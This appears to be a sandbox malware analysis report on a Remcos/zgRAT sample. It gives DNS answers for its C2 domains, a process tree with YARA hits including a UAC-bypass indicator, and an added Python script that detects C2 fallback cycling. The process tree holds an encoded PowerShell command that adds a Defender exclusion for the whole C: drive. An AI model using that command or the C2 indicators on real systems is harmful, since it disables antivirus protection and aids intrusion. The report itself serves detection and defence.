Jun 26, 2022 09:47:18.181885004 CEST | 8.8.8.8 | 192.168.2.6 | 0xc18 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:19.217360020 CEST | 8.8.8.8 | 192.168.2.6 | 0x5d04 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:20.387876034 CEST | 8.8.8.8 | 192.168.2.6 | 0x951d | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:20.411376953 CEST | 8.8.8.8 | 192.168.2.6 | 0xad41 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:20.685486078 CEST | 8.8.8.8 | 192.168.2.6 | 0x8a5b | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:21.717863083 CEST | 8.8.8.8 | 192.168.2.6 | 0x549b | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:22.973720074 CEST | 8.8.8.8 | 192.168.2.6 | 0x72df | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:22.995135069 CEST | 8.8.8.8 | 192.168.2.6 | 0x123 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:23.260404110 CEST | 8.8.8.8 | 192.168.2.6 | 0x5478 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:24.294061899 CEST | 8.8.8.8 | 192.168.2.6 | 0xdd42 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:25.462004900 CEST | 8.8.8.8 | 192.168.2.6 | 0xc3ae | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:25.483431101 CEST | 8.8.8.8 | 192.168.2.6 | 0x699f | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:25.728574991 CEST | 8.8.8.8 | 192.168.2.6 | 0xf0de | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:26.764005899 CEST | 8.8.8.8 | 192.168.2.6 | 0x28d | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
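The answers above show the sample walking the same four hostnames in the same order every three to four seconds: only nikahuve.ac.ug resolves (to 194.5.98.107), while kalskala.ac.ug and tuekisaa.ac.ug return NXDOMAIN and parthaha.ac.ug returns SERVFAIL on every pass. That shape, a fixed name list tried in fixed order at a steady cadence with most entries dead, is a cheap hunting signal on any resolver log. The following is an added example, not Joe Sandbox code and not part of the report, that parses rows in the table's column layout and flags the pattern; the twelve input rows are transcribed by hand from the answers table into pipe-delimited form, and the function names and the min_cycles threshold are assumptions of this example.

```python
# Added example (not Joe Sandbox code): parse DNS answer rows and flag a
# client cycling through a fixed C2 host list at a steady cadence.
import re
from collections import Counter, defaultdict
from datetime import datetime
from statistics import median

# Constructed input: the first twelve answer rows of the report, transcribed
# by hand as Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name |
# CName | Address | Type | Class (an empty CName cell stays an empty field).
SAMPLE_ANSWERS = """\
Jun 26, 2022 09:45:59.609529972 CEST | 8.8.8.8 | 192.168.2.6 | 0x98be | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:01.287909031 CEST | 8.8.8.8 | 192.168.2.6 | 0x629e | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:01.668832064 CEST | 8.8.8.8 | 192.168.2.6 | 0x8c38 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:02.335402966 CEST | 8.8.8.8 | 192.168.2.6 | 0xfc5b | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:03.521174908 CEST | 8.8.8.8 | 192.168.2.6 | 0x96b2 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:05.224469900 CEST | 8.8.8.8 | 192.168.2.6 | 0xad3d | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:05.407883883 CEST | 8.8.8.8 | 192.168.2.6 | 0xb7e9 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:05.879934072 CEST | 8.8.8.8 | 192.168.2.6 | 0x1817 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:07.183330059 CEST | 8.8.8.8 | 192.168.2.6 | 0x8ef1 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:08.825110912 CEST | 8.8.8.8 | 192.168.2.6 | 0xb4d | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:09.151824951 CEST | 8.8.8.8 | 192.168.2.6 | 0x6dc3 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:09.415802002 CEST | 8.8.8.8 | 192.168.2.6 | 0x3ad1 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
"""


def parse_ts(text):
    """'Jun 26, 2022 09:45:59.609529972 CEST' -> datetime. strptime's %f takes
    at most six digits, so the nanosecond field is cut to microseconds."""
    head, frac = text.rsplit(" ", 1)[0].split(".")   # drop the zone suffix
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_answers(text):
    """Rows -> dicts sorted by time; a wrong column count fails loudly."""
    records = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != 10:
            raise ValueError(f"expected 10 columns: {line!r}")
        ts, src, dst, tid, rcode, name, _cname, addr, _rtype, _rclass = cells
        records.append({
            "ts": parse_ts(ts), "src": src, "dst": dst, "tid": int(tid, 16),
            "rcode": int(re.search(r"\((\d+)\)", rcode).group(1)),
            "name": name, "address": addr if addr not in ("", "none") else None,
        })
    return sorted(records, key=lambda r: r["ts"])


def summarize(records):
    """Per name: query count, reply-code histogram, resolved addresses and
    the median spacing between successive queries for that name."""
    by_name = defaultdict(list)
    for r in records:
        by_name[r["name"]].append(r)
    summary = {}
    for name, rs in by_name.items():
        times = [r["ts"] for r in rs]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        summary[name] = {
            "queries": len(rs),
            "rcodes": Counter(r["rcode"] for r in rs),
            "addresses": {r["address"] for r in rs if r["address"]},
            "median_gap": median(gaps) if gaps else None,
        }
    return summary


def cycle_period(names):
    """Smallest p for which the name sequence repeats every p entries over at
    least two full cycles, else None."""
    n = len(names)
    for p in range(1, n // 2 + 1):
        if all(names[i] == names[i + p] for i in range(n - p)):
            return p
    return None


def find_fallback_cycling(records, min_cycles=2):
    """Flag a host that walks a fixed list of names in fixed order while some
    of them never resolve: a RAT trying its configured C2 hosts in turn.
    min_cycles is an assumed threshold, not a Joe Sandbox setting."""
    names = [r["name"] for r in records]
    period = cycle_period(names)
    if period is None or period < 2 or len(names) < period * min_cycles:
        return None
    summary = summarize(records)
    order = names[:period]
    failing = [n for n in order if not summary[n]["addresses"]]
    if not failing:
        return None   # a plain round-robin of live hosts is not this pattern
    return {
        "order": order,
        "resolving": [n for n in order if summary[n]["addresses"]],
        "failing": failing,
        "cycle_seconds": summary[order[0]]["median_gap"],
        "cycles_seen": len(names) // period,
    }


if __name__ == "__main__":
    print(find_fallback_cycling(parse_answers(SAMPLE_ANSWERS)))
```

On the rows above the finding is a four-name cycle with one live host and three dead ones, repeating every three to four seconds. The same functions apply unchanged to a resolver log filtered to one client, which is where this is useful: a workstation producing NXDOMAIN and SERVFAIL for the same small set of names at a fixed cadence for minutes on end is worth a look regardless of what the names are.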

Target ID: 0
Start time: 09:44:41
Start date: 26/06/2022
Path: C:\Users\user\Desktop\kyFBQxVbsg.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\kyFBQxVbsg.exe"
Imagebase: 0x2e0000
File size: 735232 bytes
MD5 hash: 972334F0C55D0AEAB0B32EFE41EA3470
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.526374372.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

                                                                    Target ID:3
                                                                    Start time:09:44:48
                                                                    Start date:26/06/2022
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
                                                                    Imagebase:0xf10000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    Target ID:5
                                                                    Start time:09:44:49
                                                                    Start date:26/06/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6406f0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:16
                                                                    Start time:09:45:54
                                                                    Start date:26/06/2022
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Imagebase:0x60000
                                                                    File size:41064 bytes
                                                                    MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:17
                                                                    Start time:09:45:55
                                                                    Start date:26/06/2022
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Imagebase:0xae0000
                                                                    File size:41064 bytes
                                                                    MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:19
                                                                    Start time:09:46:02
                                                                    Start date:26/06/2022
                                                                    Path:C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
                                                                    Imagebase:0x40000
                                                                    File size:735232 bytes
                                                                    MD5 hash:972334F0C55D0AEAB0B32EFE41EA3470
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000003.581326592.0000000003550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 58%, ReversingLabs
                                                                    Reputation:low

                                                                    Target ID:24
                                                                    Start time:09:46:12
                                                                    Start date:26/06/2022
                                                                    Path:C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
                                                                    Imagebase:0x9a0000
                                                                    File size:735232 bytes
                                                                    MD5 hash:972334F0C55D0AEAB0B32EFE41EA3470
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000003.587908821.0000000004060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low

                                                                    Target ID:25
                                                                    Start time:09:46:20
                                                                    Start date:26/06/2022
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Imagebase:0xe0000
                                                                    File size:41064 bytes
                                                                    MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:26
                                                                    Start time:09:46:22
                                                                    Start date:26/06/2022
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Imagebase:0x5d0000
                                                                    File size:41064 bytes
                                                                    MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:high

                                                                    Target ID:27
                                                                    Start time:09:46:23
                                                                    Start date:26/06/2022
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Imagebase:0x260000
                                                                    File size:41064 bytes
                                                                    MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:28
                                                                    Start time:09:46:25
                                                                    Start date:26/06/2022
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Imagebase:0x510000
                                                                    File size:41064 bytes
                                                                    MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
